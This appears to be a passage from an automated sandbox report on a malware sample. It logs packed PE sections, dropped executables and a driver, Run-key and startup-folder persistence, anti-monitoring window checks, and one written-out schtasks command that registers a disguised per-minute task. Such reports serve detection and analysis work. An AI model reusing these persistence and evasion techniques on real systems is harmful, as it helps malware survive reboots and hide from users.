                            Source: eb571902cc.exe.5.drStatic PE information: section name: npkvhzbc
                            Source: eb571902cc.exe.5.drStatic PE information: section name: .taggant
                            Source: random[3].exe.5.drStatic PE information: section name:
                            Source: random[3].exe.5.drStatic PE information: section name: .idata
                            Source: random[3].exe.5.drStatic PE information: section name: nprvplua
                            Source: random[3].exe.5.drStatic PE information: section name: btyxknlq
                            Source: random[3].exe.5.drStatic PE information: section name: .taggant
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name:
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: .idata
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: nprvplua
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: btyxknlq
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: .taggant
                            Source: random[3].exe0.5.drStatic PE information: section name:
                            Source: random[3].exe0.5.drStatic PE information: section name: .idata
                            Source: random[3].exe0.5.drStatic PE information: section name:
                            Source: random[3].exe0.5.drStatic PE information: section name: ubvmxkob
                            Source: random[3].exe0.5.drStatic PE information: section name: xdawalmh
                            Source: random[3].exe0.5.drStatic PE information: section name: .taggant
                            Source: d0e065d272.exe.5.drStatic PE information: section name:
                            Source: d0e065d272.exe.5.drStatic PE information: section name: .idata
                            Source: d0e065d272.exe.5.drStatic PE information: section name:
                            Source: d0e065d272.exe.5.drStatic PE information: section name: ubvmxkob
                            Source: d0e065d272.exe.5.drStatic PE information: section name: xdawalmh
                            Source: d0e065d272.exe.5.drStatic PE information: section name: .taggant
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD91C push ecx; ret 0_2_00EDD92F
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED1359 push es; ret 0_2_00ED135A
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0071D91C push ecx; ret 1_2_0071D92F
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_004010B0 push dword ptr [00409004h]; ret 7_2_0040113E
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_00407A0A push dword ptr [0040AB8Ch]; ret 7_2_00407B21
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B64D2A5 pushad ; iretd 10_2_00007FFD9B64D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B76203D push E95AF211h; ret 10_2_00007FFD9B762009
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B7600BD pushad ; iretd 10_2_00007FFD9B7600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B832316 push 8B485F94h; iretd 10_2_00007FFD9B83231B
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0096676A push rcx; ret 27_2_0096676B
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D3306E push ecx; ret 31_2_00D33081
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00446061 push edx; retf 36_2_00446062
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh36_2_0043CA63
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00445A2E push esi; ret 36_2_00445A31
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00442543 push esp; retf 36_2_00442549
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00439F70 push eax; mov dword ptr [esp], 60616263h36_2_00439F7F
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D3306E push ecx; ret 36_2_00D33081
                            Source: file.exeStatic PE information: section name: entropy: 7.962970695987235
                            Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.962970695987235
                            Source: random[1].exe.5.drStatic PE information: section name: tvjsubtq entropy: 7.955384011198986
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: tvjsubtq entropy: 7.955384011198986
                            Source: random[1].exe0.5.drStatic PE information: section name: puwxqisl entropy: 7.954945300059886
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: puwxqisl entropy: 7.954945300059886
                            Source: random[2].exe0.5.drStatic PE information: section name: entropy: 7.974057833410153
                            Source: random[2].exe0.5.drStatic PE information: section name: yoxsliso entropy: 7.9538116441003055
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: entropy: 7.974057833410153
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: yoxsliso entropy: 7.9538116441003055
                            Source: random[2].exe1.5.drStatic PE information: section name: skauaiwm entropy: 7.954743315183954
                            Source: eb571902cc.exe.5.drStatic PE information: section name: skauaiwm entropy: 7.954743315183954
                            Source: random[3].exe.5.drStatic PE information: section name: entropy: 7.798734496182183
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: entropy: 7.798734496182183
                            Source: random[3].exe0.5.drStatic PE information: section name: entropy: 7.985148780171564
                            Source: random[3].exe0.5.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494
                            Source: d0e065d272.exe.5.drStatic PE information: section name: entropy: 7.985148780171564
                            Source: d0e065d272.exe.5.drStatic PE information: section name: ubvmxkob entropy: 7.95406419852494

                            Persistence and Installation Behavior

                            barindex
                            Sample is not signed and drops a device driver
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys
                            Uses cmd line tools excessively to alter registry or file data
                            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sysJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\XpAg0vN[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeFile created: C:\Users\user\AppData\Roaming\IsStopped.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file

                            Boot Survival

                            barindex
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eb571902cc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d98ae8ad.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8d37f89c6f.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cf4367ad3a.exeJump to behavior
                            Drops VBS files to the startup folder
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to dropped file
                            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeWindow searched: window name: Regmonclass
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d98ae8ad.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84d98ae8ad.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eb571902cc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run eb571902cc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cf4367ad3a.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cf4367ad3a.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8d37f89c6f.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8d37f89c6f.exeJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
